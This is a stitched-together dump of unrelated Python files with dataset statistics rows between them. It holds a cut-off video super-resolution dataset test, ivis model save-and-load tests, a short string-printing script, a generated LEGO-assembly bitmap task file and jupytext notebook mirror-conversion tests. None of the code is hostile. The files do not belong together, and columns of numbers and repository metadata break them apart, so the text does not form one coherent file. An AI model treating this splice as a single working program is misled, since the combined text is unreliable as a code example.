np.testing.assert_almost_equal(eval_results['PSNR'], 22.6666666)
np.testing.assert_almost_equal(eval_results['SSIM'], 0.83333333)
# num_input_frames should be odd numbers
with pytest.raises(AssertionError):
SRFolderVideoDataset(
lq_folder=root_path,
gt_folder=root_path,
num_input_frames=6,
pipeline=[],
scale=4,
test_mode=True)
# metric_average_mode can only be either 'folder' or 'all'
with pytest.raises(ValueError):
SRFolderVideoDataset(
lq_folder=root_path,
gt_folder=root_path,
num_input_frames=5,
pipeline=[],
scale=4,
metric_average_mode='abc',
test_mode=False)
# results must be a list
with pytest.raises(TypeError):
test_dataset.evaluate(results=5)
# The length of results should be equal to the dataset len
with pytest.raises(AssertionError):
test_dataset.evaluate(results=[results[0]])
| 33.768463
| 79
| 0.560586
| 3,816
| 33,836
| 4.636006
| 0.069182
| 0.050647
| 0.042734
| 0.037307
| 0.870103
| 0.850885
| 0.822
| 0.794867
| 0.788254
| 0.747386
| 0
| 0.03254
| 0.34153
| 33,836
| 1,001
| 80
| 33.802198
| 0.76149
| 0.053907
| 0
| 0.773585
| 0
| 0.001179
| 0.069484
| 0.001974
| 0
| 0
| 0
| 0
| 0.09434
| 1
| 0.023585
| false
| 0.001179
| 0.008255
| 0.001179
| 0.036557
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7c3ebe34f00bbc16f79a927655a40182b6c48d3b
| 5,196
|
py
|
Python
|
tests/test_model_saving.py
|
escherba/ivis
|
bb80e00e6381d9de13fab9950d91428f4be56a58
|
[
"Apache-2.0"
] | 1
|
2021-04-21T05:31:26.000Z
|
2021-04-21T05:31:26.000Z
|
tests/test_model_saving.py
|
spiderrobot/ivis
|
bbfd8381c0f40f7219585df851ed9a2f4278bee4
|
[
"Apache-2.0"
] | null | null | null |
tests/test_model_saving.py
|
spiderrobot/ivis
|
bbfd8381c0f40f7219585df851ed9a2f4278bee4
|
[
"Apache-2.0"
] | null | null | null |
import os
import tempfile
import pytest
from sklearn import datasets
import numpy as np
import tensorflow as tf
from ivis import Ivis
@pytest.fixture(scope='function')
def model_filepath():
with tempfile.TemporaryDirectory() as temp_dir:
model_filepath = os.path.join(temp_dir, 'test.ivis.model.saving.ivis')
yield model_filepath
def test_ivis_model_saving(model_filepath):
model = Ivis(k=15, batch_size=16, epochs=5)
iris = datasets.load_iris()
X = iris.data
model.fit(X)
model.save_model(model_filepath, overwrite=True)
model_2 = Ivis()
model_2.load_model(model_filepath)
# Check that model predictions are same
assert np.all(model.transform(X) == model_2.transform(X))
# Serializable dict eles same
assert model.__getstate__() == model_2.__getstate__()
# Check all weights are the same
for model_layer, model_2_layer in zip(model.encoder.layers,
model_2.encoder.layers):
model_layer_weights = model_layer.get_weights()
model_2_layer_weights = model_2_layer.get_weights()
for i in range(len(model_layer_weights)):
assert np.all(model_layer_weights[i] == model_2_layer_weights[i])
# Check optimizer weights are the same
for w1, w2 in zip(model.model_.optimizer.get_weights(),
model_2.model_.optimizer.get_weights()):
assert np.all(w1 == w2)
# Check that trying to save over an existing folder raises an Exception
with pytest.raises(FileExistsError) as exception_info:
model.save_model(model_filepath)
assert isinstance(exception_info.value, FileExistsError)
# Check that can overwrite existing model if requested
model.save_model(model_filepath, overwrite=True)
# Train new model
y_pred_2 = model_2.fit_transform(X)
def test_supervised_model_saving(model_filepath):
model = Ivis(k=15, batch_size=16, epochs=5,
supervision_metric='sparse_categorical_crossentropy')
iris = datasets.load_iris()
X = iris.data
Y = iris.target
model.fit(X, Y)
model.save_model(model_filepath, overwrite=True)
model_2 = Ivis()
model_2.load_model(model_filepath)
# Check that model embeddings are same
assert np.all(model.transform(X) == model_2.transform(X))
# Check that model supervised predictions are same
assert np.all(model.score_samples(X) == model_2.score_samples(X))
# Serializable dict eles same
assert model.__getstate__() == model_2.__getstate__()
# Check all weights are the same
for model_layer, model_2_layer in zip(model.encoder.layers,
model_2.encoder.layers):
model_layer_weights = model_layer.get_weights()
model_2_layer_weights = model_2_layer.get_weights()
for i in range(len(model_layer_weights)):
assert np.all(model_layer_weights[i] == model_2_layer_weights[i])
# Check optimizer weights are the same
for w1, w2 in zip(model.model_.optimizer.get_weights(),
model_2.model_.optimizer.get_weights()):
assert np.all(w1 == w2)
# Check that trying to save over an existing folder raises an Exception
with pytest.raises(FileExistsError) as exception_info:
model.save_model(model_filepath)
assert isinstance(exception_info.value, FileExistsError)
# Check that can overwrite existing model if requested
model.save_model(model_filepath, overwrite=True)
# Train new model
y_pred_2 = model_2.fit_transform(X, Y)
def test_custom_model_saving(model_filepath):
iris = datasets.load_iris()
X = iris.data
Y = iris.target
# Create a custom model
inputs = tf.keras.layers.Input(shape=(X.shape[-1],))
x = tf.keras.layers.Dense(128, activation='relu')(inputs)
custom_model = tf.keras.Model(inputs, x)
model = Ivis(k=15, batch_size=16, epochs=5,
supervision_metric='sparse_categorical_crossentropy',
model=custom_model)
model.fit(X, Y)
model.save_model(model_filepath, overwrite=True)
model_2 = Ivis()
model_2.load_model(model_filepath)
# Check that model embeddings are same
assert np.all(model.transform(X) == model_2.transform(X))
# Check that model supervised predictions are same
assert np.all(model.score_samples(X) == model_2.score_samples(X))
# Serializable dict eles same
assert model.__getstate__() == model_2.__getstate__()
# Check all weights are the same
for model_layer, model_2_layer in zip(model.encoder.layers,
model_2.encoder.layers):
model_layer_weights = model_layer.get_weights()
model_2_layer_weights = model_2_layer.get_weights()
for i in range(len(model_layer_weights)):
assert np.all(model_layer_weights[i] == model_2_layer_weights[i])
# Check optimizer weights are the same
for w1, w2 in zip(model.model_.optimizer.get_weights(),
model_2.model_.optimizer.get_weights()):
assert np.all(w1 == w2)
# Train new model
y_pred_2 = model_2.fit_transform(X, Y)
| 36.591549
| 78
| 0.686297
| 719
| 5,196
| 4.699583
| 0.155772
| 0.062149
| 0.039065
| 0.037881
| 0.857946
| 0.857946
| 0.857946
| 0.846108
| 0.846108
| 0.846108
| 0
| 0.017109
| 0.223826
| 5,196
| 142
| 79
| 36.591549
| 0.820729
| 0.156467
| 0
| 0.733333
| 0
| 0
| 0.02316
| 0.020408
| 0
| 0
| 0
| 0
| 0.177778
| 1
| 0.044444
| false
| 0
| 0.077778
| 0
| 0.122222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7c791deea1e1a0eee7e1fd63513908be1b4961c7
| 84
|
py
|
Python
|
PCTC/Warm Up/Q2.py
|
object-oriented-human/competitive
|
9e761020e887d8980a39a64eeaeaa39af0ecd777
|
[
"MIT"
] | 1
|
2022-02-21T15:43:01.000Z
|
2022-02-21T15:43:01.000Z
|
PCTC/Warm Up/Q2.py
|
foooop/competitive
|
9e761020e887d8980a39a64eeaeaa39af0ecd777
|
[
"MIT"
] | null | null | null |
PCTC/Warm Up/Q2.py
|
foooop/competitive
|
9e761020e887d8980a39a64eeaeaa39af0ecd777
|
[
"MIT"
] | null | null | null |
age, c = input(), input()
print(c*(len(age)+2))
print(c+age+c)
print(c*(len(age)+2))
| 21
| 25
| 0.595238
| 18
| 84
| 2.777778
| 0.333333
| 0.36
| 0.36
| 0.48
| 0.52
| 0
| 0
| 0
| 0
| 0
| 0
| 0.025974
| 0.083333
| 84
| 4
| 26
| 21
| 0.623377
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0.75
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
7cd42ca40c2e2697a240bbef50b15f3441873170
| 6,569
|
py
|
Python
|
gabriel_lego/lego_engine/tasks/task_generated_90.py
|
molguin92/gabriel-lego-py3
|
2f8828326ca025997687a19d1af80bc1590a9290
|
[
"Apache-2.0"
] | null | null | null |
gabriel_lego/lego_engine/tasks/task_generated_90.py
|
molguin92/gabriel-lego-py3
|
2f8828326ca025997687a19d1af80bc1590a9290
|
[
"Apache-2.0"
] | 1
|
2019-09-10T23:41:41.000Z
|
2019-09-11T20:21:11.000Z
|
gabriel_lego/lego_engine/tasks/task_generated_90.py
|
molguin92/gabriel-lego-py3
|
2f8828326ca025997687a19d1af80bc1590a9290
|
[
"Apache-2.0"
] | 1
|
2022-02-22T15:29:27.000Z
|
2022-02-22T15:29:27.000Z
|
from numpy import array
# Automatically generated task with 90 steps
# Labels: nothing:0, white:1, green:2, yellow:3, red:4, blue:5, black:6,
# unsure:7
bitmaps = \
[array([[4, 4, 4, 4, 4, 4]]),
array([[0, 0, 0, 0, 2, 2],
[4, 4, 4, 4, 4, 4]]),
array([[0, 0, 5, 0, 2, 2],
[4, 4, 4, 4, 4, 4]]),
array([[4, 0, 5, 0, 2, 2],
[4, 4, 4, 4, 4, 4]]),
array([[4, 0, 5, 5, 2, 2],
[4, 4, 4, 4, 4, 4]]),
array([[4, 4, 5, 5, 2, 2],
[4, 4, 4, 4, 4, 4]]),
array([[4, 0, 5, 5, 2, 2],
[4, 4, 4, 4, 4, 4]]),
array([[4, 0, 5, 0, 2, 2],
[4, 4, 4, 4, 4, 4]]),
array([[0, 0, 5, 0, 2, 2],
[4, 4, 4, 4, 4, 4]]),
array([[0, 0, 0, 0, 2, 2],
[4, 4, 4, 4, 4, 4]]),
array([[4, 4, 4, 4, 4, 4]]),
array([[0, 0, 3, 3, 0, 0],
[4, 4, 4, 4, 4, 4]]),
array([[3, 0, 3, 3, 0, 0],
[4, 4, 4, 4, 4, 4]]),
array([[3, 3, 3, 3, 0, 0],
[4, 4, 4, 4, 4, 4]]),
array([[3, 3, 3, 3, 4, 0],
[4, 4, 4, 4, 4, 4]]),
array([[3, 3, 3, 3, 4, 4],
[4, 4, 4, 4, 4, 4]]),
array([[0, 4, 4, 0, 0, 0],
[3, 3, 3, 3, 4, 4],
[4, 4, 4, 4, 4, 4]]),
array([[0, 4, 4, 0, 0, 2],
[3, 3, 3, 3, 4, 4],
[4, 4, 4, 4, 4, 4]]),
array([[0, 4, 4, 0, 5, 2],
[3, 3, 3, 3, 4, 4],
[4, 4, 4, 4, 4, 4]]),
array([[4, 4, 4, 0, 5, 2],
[3, 3, 3, 3, 4, 4],
[4, 4, 4, 4, 4, 4]]),
array([[4, 4, 4, 2, 5, 2],
[3, 3, 3, 3, 4, 4],
[4, 4, 4, 4, 4, 4]]),
array([[3, 0, 0, 0, 0, 0],
[4, 4, 4, 2, 5, 2],
[3, 3, 3, 3, 4, 4],
[4, 4, 4, 4, 4, 4]]),
array([[3, 5, 0, 0, 0, 0],
[4, 4, 4, 2, 5, 2],
[3, 3, 3, 3, 4, 4],
[4, 4, 4, 4, 4, 4]]),
array([[3, 5, 0, 0, 0, 5],
[4, 4, 4, 2, 5, 2],
[3, 3, 3, 3, 4, 4],
[4, 4, 4, 4, 4, 4]]),
array([[3, 5, 3, 0, 0, 5],
[4, 4, 4, 2, 5, 2],
[3, 3, 3, 3, 4, 4],
[4, 4, 4, 4, 4, 4]]),
array([[3, 5, 3, 0, 4, 5],
[4, 4, 4, 2, 5, 2],
[3, 3, 3, 3, 4, 4],
[4, 4, 4, 4, 4, 4]]),
array([[3, 5, 3, 2, 4, 5],
[4, 4, 4, 2, 5, 2],
[3, 3, 3, 3, 4, 4],
[4, 4, 4, 4, 4, 4]]),
array([[3, 5, 3, 0, 4, 5],
[4, 4, 4, 2, 5, 2],
[3, 3, 3, 3, 4, 4],
[4, 4, 4, 4, 4, 4]]),
array([[3, 5, 3, 0, 0, 5],
[4, 4, 4, 2, 5, 2],
[3, 3, 3, 3, 4, 4],
[4, 4, 4, 4, 4, 4]]),
array([[3, 5, 0, 0, 0, 5],
[4, 4, 4, 2, 5, 2],
[3, 3, 3, 3, 4, 4],
[4, 4, 4, 4, 4, 4]]),
array([[3, 5, 0, 0, 0, 0],
[4, 4, 4, 2, 5, 2],
[3, 3, 3, 3, 4, 4],
[4, 4, 4, 4, 4, 4]]),
array([[3, 0, 0, 0, 0, 0],
[4, 4, 4, 2, 5, 2],
[3, 3, 3, 3, 4, 4],
[4, 4, 4, 4, 4, 4]]),
array([[4, 4, 4, 2, 5, 2],
[3, 3, 3, 3, 4, 4],
[4, 4, 4, 4, 4, 4]]),
array([[4, 4, 4, 0, 5, 2],
[3, 3, 3, 3, 4, 4],
[4, 4, 4, 4, 4, 4]]),
array([[0, 4, 4, 0, 5, 2],
[3, 3, 3, 3, 4, 4],
[4, 4, 4, 4, 4, 4]]),
array([[0, 4, 4, 0, 0, 2],
[3, 3, 3, 3, 4, 4],
[4, 4, 4, 4, 4, 4]]),
array([[0, 4, 4, 0, 0, 0],
[3, 3, 3, 3, 4, 4],
[4, 4, 4, 4, 4, 4]]),
array([[3, 3, 3, 3, 4, 4],
[4, 4, 4, 4, 4, 4]]),
array([[3, 3, 3, 3, 4, 0],
[4, 4, 4, 4, 4, 4]]),
array([[3, 3, 3, 3, 0, 0],
[4, 4, 4, 4, 4, 4]]),
array([[3, 0, 3, 3, 0, 0],
[4, 4, 4, 4, 4, 4]]),
array([[0, 0, 3, 3, 0, 0],
[4, 4, 4, 4, 4, 4]]),
array([[4, 4, 4, 4, 4, 4]]),
array([[0, 0, 0, 5, 5, 0],
[4, 4, 4, 4, 4, 4]]),
array([[0, 3, 0, 5, 5, 0],
[4, 4, 4, 4, 4, 4]]),
array([[0, 3, 0, 5, 5, 3],
[4, 4, 4, 4, 4, 4]]),
array([[5, 3, 0, 5, 5, 3],
[4, 4, 4, 4, 4, 4]]),
array([[5, 3, 3, 5, 5, 3],
[4, 4, 4, 4, 4, 4]]),
array([[5, 3, 0, 5, 5, 3],
[4, 4, 4, 4, 4, 4]]),
array([[0, 3, 0, 5, 5, 3],
[4, 4, 4, 4, 4, 4]]),
array([[0, 3, 0, 5, 5, 0],
[4, 4, 4, 4, 4, 4]]),
array([[0, 0, 0, 5, 5, 0],
[4, 4, 4, 4, 4, 4]]),
array([[4, 4, 4, 4, 4, 4]]),
array([[0, 0, 5, 5, 5, 0],
[4, 4, 4, 4, 4, 4]]),
array([[0, 5, 5, 5, 5, 0],
[4, 4, 4, 4, 4, 4]]),
array([[0, 5, 5, 5, 5, 5],
[4, 4, 4, 4, 4, 4]]),
array([[2, 5, 5, 5, 5, 5],
[4, 4, 4, 4, 4, 4]]),
array([[0, 5, 5, 5, 5, 5],
[4, 4, 4, 4, 4, 4]]),
array([[0, 5, 5, 5, 5, 0],
[4, 4, 4, 4, 4, 4]]),
array([[0, 0, 5, 5, 5, 0],
[4, 4, 4, 4, 4, 4]]),
array([[4, 4, 4, 4, 4, 4]]),
array([[0, 0, 0, 2, 2, 2],
[4, 4, 4, 4, 4, 4]]),
array([[5, 0, 0, 2, 2, 2],
[4, 4, 4, 4, 4, 4]]),
array([[5, 0, 4, 2, 2, 2],
[4, 4, 4, 4, 4, 4]]),
array([[5, 4, 4, 2, 2, 2],
[4, 4, 4, 4, 4, 4]]),
array([[0, 0, 0, 4, 4, 0],
[5, 4, 4, 2, 2, 2],
[4, 4, 4, 4, 4, 4]]),
array([[0, 2, 0, 4, 4, 0],
[5, 4, 4, 2, 2, 2],
[4, 4, 4, 4, 4, 4]]),
array([[2, 2, 0, 4, 4, 0],
[5, 4, 4, 2, 2, 2],
[4, 4, 4, 4, 4, 4]]),
array([[2, 2, 3, 4, 4, 0],
[5, 4, 4, 2, 2, 2],
[4, 4, 4, 4, 4, 4]]),
array([[2, 2, 3, 4, 4, 3],
[5, 4, 4, 2, 2, 2],
[4, 4, 4, 4, 4, 4]]),
array([[0, 0, 4, 4, 4, 4],
[2, 2, 3, 4, 4, 3],
[5, 4, 4, 2, 2, 2],
[4, 4, 4, 4, 4, 4]]),
array([[0, 2, 4, 4, 4, 4],
[2, 2, 3, 4, 4, 3],
[5, 4, 4, 2, 2, 2],
[4, 4, 4, 4, 4, 4]]),
array([[5, 2, 4, 4, 4, 4],
[2, 2, 3, 4, 4, 3],
[5, 4, 4, 2, 2, 2],
[4, 4, 4, 4, 4, 4]]),
array([[0, 2, 4, 4, 4, 4],
[2, 2, 3, 4, 4, 3],
[5, 4, 4, 2, 2, 2],
[4, 4, 4, 4, 4, 4]]),
array([[0, 0, 4, 4, 4, 4],
[2, 2, 3, 4, 4, 3],
[5, 4, 4, 2, 2, 2],
[4, 4, 4, 4, 4, 4]]),
array([[2, 2, 3, 4, 4, 3],
[5, 4, 4, 2, 2, 2],
[4, 4, 4, 4, 4, 4]]),
array([[2, 2, 3, 4, 4, 0],
[5, 4, 4, 2, 2, 2],
[4, 4, 4, 4, 4, 4]]),
array([[2, 2, 0, 4, 4, 0],
[5, 4, 4, 2, 2, 2],
[4, 4, 4, 4, 4, 4]]),
array([[0, 2, 0, 4, 4, 0],
[5, 4, 4, 2, 2, 2],
[4, 4, 4, 4, 4, 4]]),
array([[0, 0, 0, 4, 4, 0],
[5, 4, 4, 2, 2, 2],
[4, 4, 4, 4, 4, 4]]),
array([[5, 4, 4, 2, 2, 2],
[4, 4, 4, 4, 4, 4]]),
array([[5, 0, 4, 2, 2, 2],
[4, 4, 4, 4, 4, 4]]),
array([[5, 0, 0, 2, 2, 2],
[4, 4, 4, 4, 4, 4]]),
array([[0, 0, 0, 2, 2, 2],
[4, 4, 4, 4, 4, 4]]),
array([[4, 4, 4, 4, 4, 4]]),
array([[0, 3, 3, 3, 0, 0],
[4, 4, 4, 4, 4, 4]]),
array([[0, 3, 3, 3, 2, 0],
[4, 4, 4, 4, 4, 4]]),
array([[0, 3, 3, 3, 2, 5],
[4, 4, 4, 4, 4, 4]]),
array([[4, 3, 3, 3, 2, 5],
[4, 4, 4, 4, 4, 4]]),
array([[0, 0, 2, 2, 2, 2],
[4, 3, 3, 3, 2, 5],
[4, 4, 4, 4, 4, 4]])]
| 27.60084
| 72
| 0.293956
| 1,480
| 6,569
| 1.30473
| 0.018919
| 0.600725
| 0.669601
| 0.66494
| 0.93682
| 0.935267
| 0.935267
| 0.935267
| 0.934749
| 0.933713
| 0
| 0.332284
| 0.371442
| 6,569
| 237
| 73
| 27.7173
| 0.135384
| 0.018572
| 0
| 0.934498
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.004367
| 0
| 0.004367
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 14
|
6b0fa3c199ad3a4d5b9bb1849fa8519856329829
| 13,356
|
py
|
Python
|
tests/test_mirror.py
|
vmarceau/jupytext
|
799ea65b693a5f387fe37c9aebad463a97d1dd38
|
[
"MIT"
] | null | null | null |
tests/test_mirror.py
|
vmarceau/jupytext
|
799ea65b693a5f387fe37c9aebad463a97d1dd38
|
[
"MIT"
] | null | null | null |
tests/test_mirror.py
|
vmarceau/jupytext
|
799ea65b693a5f387fe37c9aebad463a97d1dd38
|
[
"MIT"
] | 1
|
2021-07-02T17:49:27.000Z
|
2021-07-02T17:49:27.000Z
|
"""Here we generate mirror representation of py, Rmd and ipynb files
as py or ipynb, and make sure that these representations minimally
change on new releases.
"""
import os
import pytest
from nbformat.v4.nbbase import new_notebook
from jupytext.compare import compare
import jupytext
from jupytext.compare import compare_notebooks, combine_inputs_with_outputs
from jupytext.formats import long_form_one_format
from jupytext.paired_paths import full_path
from .utils import list_notebooks, skip_if_dict_is_not_ordered, requires_pandoc, requires_sphinx_gallery
pytestmark = skip_if_dict_is_not_ordered
def create_mirror_file_if_missing(mirror_file, notebook, fmt):
if not os.path.isfile(mirror_file):
jupytext.write(notebook, mirror_file, fmt=fmt)
def test_create_mirror_file_if_missing(tmpdir, no_jupytext_version_number):
py_file = str(tmpdir.join('notebook.py'))
assert not os.path.isfile(py_file)
create_mirror_file_if_missing(py_file, new_notebook(), 'py')
assert os.path.isfile(py_file)
def assert_conversion_same_as_mirror(nb_file, fmt, mirror_name, compare_notebook=False):
dirname, basename = os.path.split(nb_file)
file_name, org_ext = os.path.splitext(basename)
fmt = long_form_one_format(fmt)
ext = fmt['extension']
mirror_file = os.path.join(dirname, '..', 'mirror', mirror_name, full_path(file_name, fmt))
notebook = jupytext.read(nb_file, fmt=fmt)
# it's better not to have Jupytext metadata in test notebooks:
if fmt == 'ipynb' and 'jupytext' in notebook.metadata: # pragma: no cover
notebook.metadata.pop('jupytext')
jupytext.write(nb_file, fmt=fmt)
create_mirror_file_if_missing(mirror_file, notebook, fmt)
# Compare the text representation of the two notebooks
if compare_notebook:
nb_mirror = jupytext.read(mirror_file)
compare(nb_mirror, notebook)
return
elif ext == '.ipynb':
notebook = jupytext.read(mirror_file)
fmt.update({'extension': org_ext})
actual = jupytext.writes(notebook, fmt)
with open(nb_file, encoding='utf-8') as fp:
expected = fp.read()
else:
actual = jupytext.writes(notebook, fmt)
with open(mirror_file, encoding='utf-8') as fp:
expected = fp.read()
if not actual.endswith('\n'):
actual = actual + '\n'
compare(expected, actual)
# Compare the two notebooks
if ext != '.ipynb':
notebook = jupytext.read(nb_file)
nb_mirror = jupytext.read(mirror_file, fmt=fmt)
if fmt.get('format_name') == 'sphinx':
nb_mirror.cells = nb_mirror.cells[1:]
for cell in notebook.cells:
cell.metadata = {}
for cell in nb_mirror.cells:
cell.metadata = {}
compare_notebooks(notebook, nb_mirror, fmt)
combine_inputs_with_outputs(nb_mirror, notebook)
compare_notebooks(notebook, nb_mirror, fmt, compare_outputs=True)
@pytest.mark.parametrize('nb_file', list_notebooks('julia') + list_notebooks('python') + list_notebooks('R'))
def test_script_to_ipynb(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'ipynb', 'script_to_ipynb')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_julia'))
def test_ipynb_to_julia(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'jl', 'ipynb_to_script')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_py', skip='many hash'))
def test_ipynb_to_python(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'py', 'ipynb_to_script')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_py', skip=''))
def test_ipynb_to_python_vim(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, {'extension': '.py', 'cell_markers': '{{{,}}}'},
'ipynb_to_script_vim_folding_markers')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_py', skip=''))
def test_ipynb_to_python_vscode(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, {'extension': '.py', 'cell_markers': 'region,endregion'},
'ipynb_to_script_vscode_folding_markers')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_R'))
def test_ipynb_to_R(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'R', 'ipynb_to_script')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_R'))
def test_ipynb_to_r(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, '.low.r', 'ipynb_to_script')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_m'))
def test_ipynb_to_m(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, '.m', 'ipynb_to_script')
@pytest.mark.parametrize('nb_file,extension',
[(nb_file, extension)
for nb_file in list_notebooks('ipynb_scheme')
for extension in ('ss', 'scm')])
def test_ipynb_to_scheme(nb_file, extension, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, extension, 'ipynb_to_script')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_clojure'))
def test_ipynb_to_clojure(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'clj', 'ipynb_to_script')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_bash'))
def test_ipynb_to_bash(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'sh', 'ipynb_to_script')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_cpp'))
def test_ipynb_to_cpp(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'cpp', 'ipynb_to_script')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_q'))
def test_ipynb_to_q(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'q', 'ipynb_to_script')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_julia'))
def test_ipynb_to_julia_percent(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'jl:percent', 'ipynb_to_percent')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_m'))
def test_ipynb_to_m_percent(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'm:percent', 'ipynb_to_percent')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_py', skip=''))
def test_ipynb_to_python_percent(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'py:percent', 'ipynb_to_percent')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_py'))
def test_ipynb_to_python_hydrogen(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'py:hydrogen', 'ipynb_to_hydrogen')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_R'))
def test_ipynb_to_R_percent(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'R:percent', 'ipynb_to_percent')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_R'))
def test_ipynb_to_r_percent(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, '.low.r:percent', 'ipynb_to_percent')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_R'))
def test_ipynb_to_R_spin(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'R', 'ipynb_to_spin')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_R'))
def test_ipynb_to_r_spin(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, '.low.r', 'ipynb_to_spin')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_cpp'))
def test_ipynb_to_cpp_percent(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'cpp:percent', 'ipynb_to_percent')
@pytest.mark.parametrize('nb_file,extension',
[(nb_file, extension)
for nb_file in list_notebooks('ipynb_scheme')
for extension in ('ss', 'scm')])
def test_ipynb_to_scheme_percent(nb_file, extension, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file,
'{}:percent'.format(extension),
'ipynb_to_percent')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_clojure'))
def test_ipynb_to_clojure_percent(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'clj:percent', 'ipynb_to_percent')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_bash'))
def test_ipynb_to_bash_percent(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'sh:percent', 'ipynb_to_percent')
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_q'))
def test_ipynb_to_q_percent(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'q:percent', 'ipynb_to_percent')
@pytest.mark.parametrize('nb_file', list_notebooks('percent'))
def test_percent_to_ipynb(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'ipynb:percent', 'script_to_ipynb')
@pytest.mark.parametrize('nb_file', list_notebooks('hydrogen'))
def test_hydrogen_to_ipynb(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'ipynb:hydrogen', 'script_to_ipynb')
@pytest.mark.parametrize('nb_file', list_notebooks('R_spin'))
def test_spin_to_ipynb(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'ipynb:spin', 'script_to_ipynb')
@requires_sphinx_gallery
@pytest.mark.parametrize('nb_file', list_notebooks('ipynb_py', skip='(raw|hash|frozen|magic|html|164|long)'))
def test_ipynb_to_python_sphinx(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'py:sphinx', 'ipynb_to_sphinx')
@requires_sphinx_gallery
@pytest.mark.parametrize('nb_file', list_notebooks('sphinx'))
def test_sphinx_to_ipynb(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'ipynb:sphinx', 'sphinx_to_ipynb')
@requires_sphinx_gallery
@pytest.mark.parametrize('nb_file', list_notebooks('sphinx'))
def test_sphinx_md_to_ipynb(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, {'extension': '.ipynb', 'format_name': 'sphinx', 'rst2md': True},
'sphinx-rst2md_to_ipynb', compare_notebook=True)
@pytest.mark.parametrize('nb_file', list_notebooks('md'))
def test_md_to_ipynb(nb_file, no_jupytext_version_number):
assert_conversion_same_as_mirror(nb_file, 'ipynb', 'md_to_ipynb')
